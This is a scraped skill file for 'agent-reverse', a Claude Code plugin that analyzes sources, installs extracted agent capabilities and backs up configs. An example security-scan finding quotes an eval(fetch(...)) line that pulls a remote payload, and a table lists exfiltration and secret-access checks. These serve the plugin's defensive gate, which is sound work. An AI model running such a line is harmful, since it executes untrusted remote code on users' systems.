From agent-reverse
Reverse engineer and extract capabilities from any source — GitHub repos, local Claude Code configs, installed binaries, articles, or raw settings files. Use when user says /agent-reverse, wants to analyze a repo for extractable skills, audit their local Claude setup, install capabilities from external sources, or sync their skill manifest. Includes security scanning, manifest tracking, and cross-agent restore.
npx claudepluginhub shihwesley/shihwesley-plugins --plugin agent-reverseThis skill uses the workspace's default tool permissions.
Reverse engineering engine for agent capabilities. Extracts, analyzes, and installs skills and tools from any source: GitHub repos, local Claude Code settings, installed binaries, articles, or raw configs. Prevents bloat by installing only what you need.
Verifies tests pass on completed feature branch, presents options to merge locally, create GitHub PR, keep as-is or discard; executes choice and cleans up worktree.
Guides root cause investigation for bugs, test failures, unexpected behavior, performance issues, and build failures before proposing fixes.
Writes implementation plans from specs for multi-step tasks, mapping files and breaking into TDD bite-sized steps before coding.
Reverse engineering engine for agent capabilities. Extracts, analyzes, and installs skills and tools from any source: GitHub repos, local Claude Code settings, installed binaries, articles, or raw configs. Prevents bloat by installing only what you need.
AgentReverse can reverse engineer anything the user points it at. Don't limit yourself to GitHub URLs. If the user says "look at my hooks" or "what does this binary do" or "extract a skill from this config" — figure it out.
Input detection:
local / my settings / my config → local introspection (local_scan)web_interpret)Heavy operations run in the agent-reverse-engine subagent. This keeps repo cloning, AST parsing, security scanning, and manifest diffing out of your main context.
Delegate these commands to the subagent automatically:
analyze (all source types)auditsyncWhen the subagent returns results, present them to the user and handle any follow-up (install confirmations, update approvals) in the main conversation.
Light operations stay inline (no subagent needed):
installcheck-updatesbackup / restore / backup-list/agent-reverse analyze <source> — DELEGATE TO SUBAGENTAnalyze any source for extractable capabilities.
Delegate to the agent-reverse-engine subagent with the source argument. The subagent handles cloning, parsing, scanning, and cleanup. It returns a structured report.
After receiving the subagent's results:
/agent-reverse install below)Source types:
<github-url> — clone and analyze a repo<file-path> — analyze a local file or directorylocal — scan your entire Claude Code environment<article-url> — extract capabilities from a web articleExample:
User: /agent-reverse analyze https://github.com/anthropics/claude-code-plugins
[Subagent runs: clone → analyze → cleanup]
You: Found 5 capabilities, 2 MCP tools:
1. code-review — Review PRs [/command]
2. test-runner — Run tests [/command]
3. helper-utils — Internal utilities [agent-only]
Which to install?
/agent-reverse install <id>Install a capability from a previously analyzed source. Runs inline (no subagent).
Steps:
security_scan on the capability before writing anything
--force to overrideinstall_capability with appropriate settings/command is availableExample (clean install):
User: /agent-reverse install code-review
You: Security scan: clear (0/10 risk).
Installed code-review → .claude/skills/code-review/SKILL.md
Added to manifest.
Example (security finding):
User: /agent-reverse install sketchy-tool
You: Security scan found issues:
[CRITICAL] Remote execution — line 15: eval(fetch('https://unknown.site/payload'))
Install blocked. Use --force to override (not recommended).
/agent-reverse sync — DELEGATE TO SUBAGENTReinstall all capabilities from the manifest.
Delegate to the agent-reverse-engine subagent. It handles the full sync and returns installed/failed/skipped counts.
Example:
User: /agent-reverse sync
[Subagent runs manifest_sync]
You: Synced 5 capabilities. 5 installed, 0 failed, 1 skipped (superseded).
/agent-reverse audit — DELEGATE TO SUBAGENTCheck for bloat, duplicates, security issues, and optimization opportunities.
Delegate to the agent-reverse-engine subagent. It cross-references the manifest against the local environment and returns a structured report.
After receiving results, present findings and offer to act on recommendations.
Example:
User: /agent-reverse audit
[Subagent runs local_scan + manifest_list + cross-reference]
You: 12 skills installed (3 untracked), 2 potential duplicates.
Dead: helper-utils (never referenced). Deprecated: 1 setting.
MCP servers: 2 healthy, 1 unreachable.
/agent-reverse check-updatesCheck if installed capabilities have newer versions, and check if Claude Code itself has updated. Runs inline (no subagent).
Steps:
manifest_check_updates for capability versionschangelog_check for Claude Code version changesExample:
User: /agent-reverse check-updates
You: Capabilities: 2 outdated (code-review, test-runner).
Claude Code: updated 2.1.39 → 2.1.40.
Auto-applied: renamed deprecated setting.
Needs review: new maxTokens default changed.
Update capabilities?
/agent-reverse backup [options]Create a backup of all capabilities, skills, and configs. Runs inline (no subagent).
Steps:
backup_create with options:
agent-reverse-backup-<date>.json--gist: upload to GitHub Gist (private by default)--gist --public: upload as public gist--repo owner/name: push to GitHub repoExample:
User: /agent-reverse backup --gist
You: Backup uploaded: https://gist.github.com/user/abc123 (11 capabilities, 16 files)
/agent-reverse restore <source>Restore capabilities from a backup. Runs inline (no subagent).
Steps:
backup_list to preview contentsbackup_restore with options:
source: local path, gist URL, or repo URL--merge: merge with existing (default: replace)--dry-run: preview without writing--target <agent>: cross-agent restore (claude-code, cursor, antigravity)Example:
User: /agent-reverse restore https://gist.github.com/user/abc123 --target cursor
You: Cross-agent restore: claude-code → cursor. Restored 8 capabilities.
/agent-reverse backup-list <source>Preview backup contents without restoring. Runs inline (no subagent).
Steps:
backup_list with the source path/URLExample:
User: /agent-reverse backup-list ./backup.json
You: 11 capabilities, 16 files. Created: 2026-01-31.
Every install_capability call is gated by security_scan. The scanner checks six dimensions using pattern matching (no LLM cost):
| Category | Severity | Action |
|---|---|---|
| Remote execution | CRITICAL | Block install |
| Data exfiltration | CRITICAL | Block install |
| Secret access | MEDIUM | Warn + confirm |
| Persistence | MEDIUM | Warn + confirm |
| Destructive ops | LOW | Info only |
| Obfuscation | LOW | Info only |
Users can override CRITICAL blocks with --force. Don't recommend it.
On session start, changelog_check runs automatically:
claude --version against cached versionMigration rules are stored in migration-rules.json (static rules for known changes, LLM fallback for unknown entries).
Detect the current agent system:
.claude/ exists → claude-code.cursor/ exists → cursor.agent/ exists → antigravityaudit periodically to keep your setup leanagent-reverse.json) is portable — copy to new environments and syncanalyze local is the quickest way to health-check your Claude Code setup